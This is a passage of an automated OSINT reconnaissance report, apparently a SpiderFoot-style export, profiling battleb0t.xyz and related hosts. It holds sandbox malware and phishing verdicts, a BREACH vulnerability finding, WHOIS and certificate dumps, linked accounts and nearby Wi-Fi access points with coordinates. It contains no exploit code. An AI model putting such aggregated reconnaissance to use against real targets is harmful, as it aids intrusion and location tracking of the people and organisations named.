Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'63f8dbfa2553cc49d7017635', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'185.199.109.153'], u'sha256': u'f995a25ba6423268bc0802ef0e448acc6e53a3d5d5bc1fb0bc0ab30a5474f813', u'sha512': u'f2f8ebf1f38c5b60b4222bf3ddc388e24d2803a222851791969b2135e908709b290076559ff2097ec884b5c0df35646ed8d8d8c307297cdd2e8c5d60256c5e07', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://nerro13.github.io/', u'submission_id': u'63f8dbfa2553cc49d7017636', u'created_at': u'2023-02-24T15:47:06+00:00', u'filename': None}], u'analysis_start_time': u'2023-02-24T15:52:38+00:00', u'tags': [u'phishing'], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 4, u'machine_learning_models': [], u'total_signatures': 10, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'c2a8a96e599a43bdf2bf5ad44d2dce1d', u'network_mode': u'default', u'processes': [], u'sha1': u'2899a751e27c184052242cb5db2ef2689c79b9ec', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Phishing site', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [u'nerro13.github.io'], u'extracted_files': [], u'type_short': []}] | 185.199.109.153 |
| 2023-05-12 03:06:21 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 0 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | funny.battleb0t.xyz |
| 2023-05-12 02:45:27 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | Toronto, Ontario, ON, Canada, CA | 172.67.168.252 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Career.habr (Category: business)
https://career.habr.com/login | login |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.210): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:17 | BGP AS Membership | No | Censys | 0 | 0 | 4 | 0 | None | 13335 | 2606:4700:3037::6815:470e |
| 2023-05-12 03:01:06 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.114): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:51:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 26, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://nagisa-clinic.jp/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:1464:304:WilStaging_02"\n "Local\\SM0:1464:120:WilError_01"\n "SM0:1464:120:WilError_01"\n "Local\\SM0:1464:304:WilStaging_02"\n "InternetShortcutMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"210.224.185.183:443"\n "138.91.254.96:443"\n "104.26.7.173:443"\n "104.18.11.207:443"\n "142.251.46.202:443"\n "185.199.108.153:443"\n "142.250.191.67:443"\n "142.250.189.170:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajaxzip3.github.io"\n "api.edgeoffer.microsoft.com"\n "code.ionicframework.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "maps.googleapis.com"\n "nagisa-clinic.jp"\n "netdna.bootstrapcdn.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4144_1312124947\\shopping.js]- [targetUID: 00000000-00004144]\n "f_0004d6" has type "PNG image data 2000 x 1000 8-bit/color RGBA non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d6]- [targetUID: 00000000-00007688]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00007688]\n "f_0004d5" has type "gzip compressed data from Unix original size modulo 2^32 4133692"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d5]- [targetUID: 00000000-00007688]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir4144_1094547702\\Ruleset Data]- [targetUID: 00000000-00004144]\n "f_0004d4" has type "gzip compressed data from Unix original size modulo 2^32 3947552"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d4]- [targetUID: 00000000-00007688]\n "wallet-stable.json" has type "ASCII text"- [targetUID: 00000000-00004144]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\4144_1762870862\\Filtering Rules]- [targetUID: 00000000-00004144]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\4144_1474562033\\edge_driver.js]- [targetUID: 00000000-00004144]\n "f_0004cf" has type "Web Open Font Format (Version 2) CFF length 1653848 version 1.262"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004cf]- [targetUID: 00000000-00007688]\n "f_0004d1" has type "Web Open Font Format (Version 2) CFF length 1590040 version 1.262"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d1]- [targetUID: 00000000-00007688]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4144_1312124947\\edge_driver.js]- [targetUID: 00000000-00004144]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00007688]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4144_1474562033\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00004144]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4144_1312124947\\auto_open_controller.js]- [targetUID: 00000000-00004144]\n "f_0004d0" has type "PNG image data 1300 x 750 8-bit/color RGBA non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d0]- [targetUID: 00000000-00007688]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00004144]\n "000013.ldb" has type "data"- [targetUID: N/A]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4144_1474562033\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00004144]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4144_1474562033\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00004144]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4144_1312124947\\edge_checkout_page_validator.js]- [targetUID: 00000000-00004144]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4144_1312124947\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004144]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4144_1312124947\\product_page.js]- [targetUID: 00000000-00004144]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "notification.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00004144]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\4144_1762870862\\Filtering Rules-AA]- [targetUID: 00000000-00004144]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00 | 185.199.108.153 |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | jQuery | funny.battleb0t.xyz |
| 2023-05-12 02:44:22 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | United States | 185.199.108.153 |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5eb92eaeff3814-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 02:46:49 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 104.196.30.220 |
| 2023-05-12 03:18:47 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Rotated 180 @ 18} | https://pics.battleb0t.xyz/images/random_3.jpg |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | matrix (Net ID: 00:02:2D:03:92:64) | 37.780462,-122.390564 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1620 Guest (Net ID: 00:01:21:30:37:80) | 52.3759, 4.8975 |
| 2023-05-12 03:24:51 | Country | No | Country Name Extractor | 0 | 0 | 7 | 0 | None | Spain | Domain Name: TELLERIA.COM
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T18:34:23Z
Registry Expiry Date: 2023-08-11T18:34:23Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-222-C.GANDI.NET
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: telleria.com
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T16:34:23Z
Registrar Registration Expiration Date: 2023-08-11T18:34:23Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: CodeSyntax
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Marcajes Telleria S.L.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: ES
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 589e2ad15175f1c51c0a91d29b753337-1077158@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
Name Server: NS-222-C.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL: http://www.codesyntax.com/
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 02:44:18 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS RSA SHA256 2020 CA1 | 185.199.110.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SpeedStream (Net ID: 00:01:24:F0:82:16) | 37.780462,-122.390564 |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | rathook.cc | 185.199.109.153 |
| 2023-05-12 02:44:28 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0c:e3:f4:1c:e8:cb:bb:cf:13:f7:6c:6f:36:5e:c2:eb
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Feb 11 05:22:10 2023 GMT
Not After : May 12 05:22:09 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ce:18:28:ee:1e:4b:a0:54:f5:b2:a8:46:72:fa:
7a:1b:b5:83:d9:b7:b9:85:b6:7e:b8:27:ed:42:bb:
f5:8d:d9:0c:96:a1:ac:39:e8:ba:ac:6a:f9:9f:0d:
46:7d:1d:65:d4:56:4a:89:c7:ac:f3:42:0e:7d:79:
7a:b0:01:1a:1e:df:5a:64:96:92:41:7b:76:b3:71:
65:05:d4:d3:ac:cb:dd:ed:f6:10:2e:3d:94:bc:fe:
b8:5d:9b:af:1f:73:66:41:55:24:91:8f:6a:93:09:
c4:a9:4e:cc:3f:db:83:53:92:be:e5:79:63:d7:c0:
f2:ad:fb:15:4c:da:cf:26:0f:ae:09:13:32:5e:2f:
61:79:df:43:b7:2e:3e:7a:3f:f1:71:51:6a:d0:2c:
51:14:2b:e5:5a:3a:2a:63:a7:80:69:d6:dd:ff:21:
c9:3a:6c:59:b1:94:d7:a0:d6:e0:c5:59:62:0d:45:
33:fc:cc:08:f3:b9:08:a9:ea:24:98:5f:22:3c:5b:
51:7a:ef:2a:db:8c:ca:b6:bd:39:1c:ec:e9:76:19:
54:df:f7:38:11:32:20:7f:02:4a:bb:97:a7:34:fd:
a8:8b:36:ea:36:af:62:53:9d:78:4a:b7:98:3a:a9:
07:8f:74:9e:43:31:08:ab:be:62:c0:5e:01:ec:ce:
53:dd
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
F7:A7:5E:24:2E:1C:7A:7A:2A:90:36:DF:66:18:6B:A7:17:36:7E:3E
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/_NaLKSGSIEY
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/fXbrD094iyQ.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
09:bc:ea:b6:cf:53:d5:18:fa:35:01:f5:1a:84:b4:db:1b:35:
a8:21:d4:b0:1c:8c:61:d9:0a:ed:8a:98:0e:ec:59:d1:7e:8a:
57:4f:81:85:21:9d:81:17:a5:6d:50:b7:02:17:30:3f:51:39:
0f:0d:a8:d9:9c:3b:6f:9f:16:6b:f6:f6:71:30:1e:f6:cd:df:
76:28:c1:38:b4:2a:e8:d2:ce:d8:22:7a:dc:2b:32:d6:cb:47:
88:b5:09:84:fa:12:6c:6e:e0:35:16:bb:24:8c:97:ba:91:7e:
45:50:9e:95:dc:7b:ff:96:e1:f9:37:11:30:5c:89:2e:ed:a5:
42:7f:26:b7:5c:84:0f:5f:e0:da:f9:32:fa:e2:bd:aa:52:51:
70:cd:f0:79:e0:2d:8e:67:56:3c:ba:c2:1e:d9:2f:a6:4b:13:
8c:cf:70:85:8b:05:86:ea:ed:7a:8a:75:c4:87:c4:fc:b8:11:
72:8c:37:b1:f0:08:21:35:fa:6a:0a:a7:28:58:06:2e:4b:74:
11:70:1e:20:5f:d2:60:2c:f6:42:ca:fa:2c:6e:50:27:2a:ea:
bd:8f:2d:c2:66:e4:e3:0c:69:4a:0b:47:18:a2:29:2b:ca:35:
4e:52:e9:78:dd:08:a8:e2:6b:51:5d:78:d4:f2:8b:19:66:55:
d1:aa:21:f5
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-EC32 (Net ID: 00:1D:D1:32:EC:30) | 32.8608, -79.9746 |
| 2023-05-12 02:44:14 | IPv6 Address | No | DNS Resolver | 15 | 0 | 1 | 0 | None | 2606:50c0:8000::153 | battleb0t.xyz |
| 2023-05-12 03:09:34 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 212.30.196.104.bc.googleusercontent.com | 104.196.30.212 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | vsco (Category: social)
https://vsco.co/ayhu/gallery | ayhu |
| 2023-05-12 02:54:20 | HTTP Headers | No | Web Spider | 3 | 0 | 2 | 0 | None | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f605eb97732c7-EWR"} | nuke.battleb0t.xyz |
| 2023-05-12 03:00:51 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0000-bigtree.github.io | 185.199.111.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", 